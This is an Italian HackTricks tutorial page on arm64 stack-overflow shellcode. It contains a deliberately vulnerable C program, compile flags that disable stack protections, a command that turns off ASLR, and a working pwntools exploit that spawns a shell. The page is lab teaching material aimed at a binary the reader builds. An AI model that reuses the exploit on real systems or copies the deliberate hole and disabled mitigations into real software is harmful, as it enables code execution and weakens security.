mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-29 16:10:54 +00:00
86 lines
3.1 KiB
Markdown
86 lines
3.1 KiB
Markdown
|
# Shellcode dello Stack - arm64
|
||
|
|
||
|
<details>
|
||
|
|
||
|
<summary><strong>Impara l'hacking AWS da zero a eroe con</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Esperto Red Team AWS di HackTricks)</strong></a><strong>!</strong></summary>
|
||
|
|
||
|
Altri modi per supportare HackTricks:
|
||
|
|
||
|
* Se desideri vedere la tua **azienda pubblicizzata su HackTricks** o **scaricare HackTricks in PDF** Controlla i [**PIANI DI ABBONAMENTO**](https://github.com/sponsors/carlospolop)!
|
||
|
* Ottieni il [**merchandising ufficiale di PEASS & HackTricks**](https://peass.creator-spring.com)
|
||
|
* Scopri [**La Famiglia PEASS**](https://opensea.io/collection/the-peass-family), la nostra collezione di [**NFT esclusivi**](https://opensea.io/collection/the-peass-family)
|
||
|
* **Unisciti al** 💬 [**Gruppo Discord**](https://discord.gg/hRep4RUj7f) o al [**gruppo telegram**](https://t.me/peass) o **seguici** su **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||
|
* **Condividi i tuoi trucchi di hacking inviando PR a** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||
|
|
||
|
</details>
|
||
|
|
||
|
Trova un'introduzione all'arm64 in:
|
||
|
|
||
|
{% content-ref url="../../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md" %}
|
||
|
[arm64-basic-assembly.md](../../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md)
|
||
|
{% endcontent-ref %}
|
||
|
|
||
|
## Codice 
|
||
|
```c
|
||
|
#include <stdio.h>
|
||
|
#include <unistd.h>
|
||
|
|
||
|
void vulnerable_function() {
|
||
|
char buffer[64];
|
||
|
read(STDIN_FILENO, buffer, 256); // <-- bof vulnerability
|
||
|
}
|
||
|
|
||
|
int main() {
|
||
|
vulnerable_function();
|
||
|
return 0;
|
||
|
}
|
||
|
```
|
||
|
Compilare senza pie, canary e nx:
|
||
|
|
||
|
{% code overflow="wrap" %}
|
||
|
```bash
|
||
|
clang -o bof bof.c -fno-stack-protector -Wno-format-security -no-pie -z execstack
|
||
|
```
|
||
|
## Nessun ASLR & Nessun canary - Stack Overflow 
|
||
|
|
||
|
Per fermare ASLR eseguire:
|
||
|
```bash
|
||
|
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
|
||
|
```
|
||
|
Per ottenere l'[**offset del bof controlla questo link**](../ret2win/ret2win-arm64.md#finding-the-offset).
|
||
|
|
||
|
Sfruttare:
|
||
|
```python
|
||
|
from pwn import *
|
||
|
|
||
|
# Load the binary
|
||
|
binary_name = './bof'
|
||
|
elf = context.binary = ELF(binary_name)
|
||
|
|
||
|
# Generate shellcode
|
||
|
shellcode = asm(shellcraft.sh())
|
||
|
|
||
|
# Start the process
|
||
|
p = process(binary_name)
|
||
|
|
||
|
# Offset to return address
|
||
|
offset = 72
|
||
|
|
||
|
# Address in the stack after the return address
|
||
|
ret_address = p64(0xfffffffff1a0)
|
||
|
|
||
|
# Craft the payload
|
||
|
payload = b'A' * offset + ret_address + shellcode
|
||
|
|
||
|
print("Payload length: "+ str(len(payload)))
|
||
|
|
||
|
# Send the payload
|
||
|
p.send(payload)
|
||
|
|
||
|
# Drop to an interactive session
|
||
|
p.interactive()
|
||
|
```
|
||
|
L'unica cosa "complicata" da trovare qui sarebbe l'indirizzo nello stack da chiamare. Nel mio caso ho generato l exploit con l'indirizzo trovato usando gdb, ma poi quando l'ho sfruttato non ha funzionato (perché l'indirizzo dello stack è cambiato leggermente).
|
||
|
|
||
|
Ho aperto il file **`core` generato** (`gdb ./bog ./core`) e ho controllato l'indirizzo reale dell'inizio dello shellcode.
|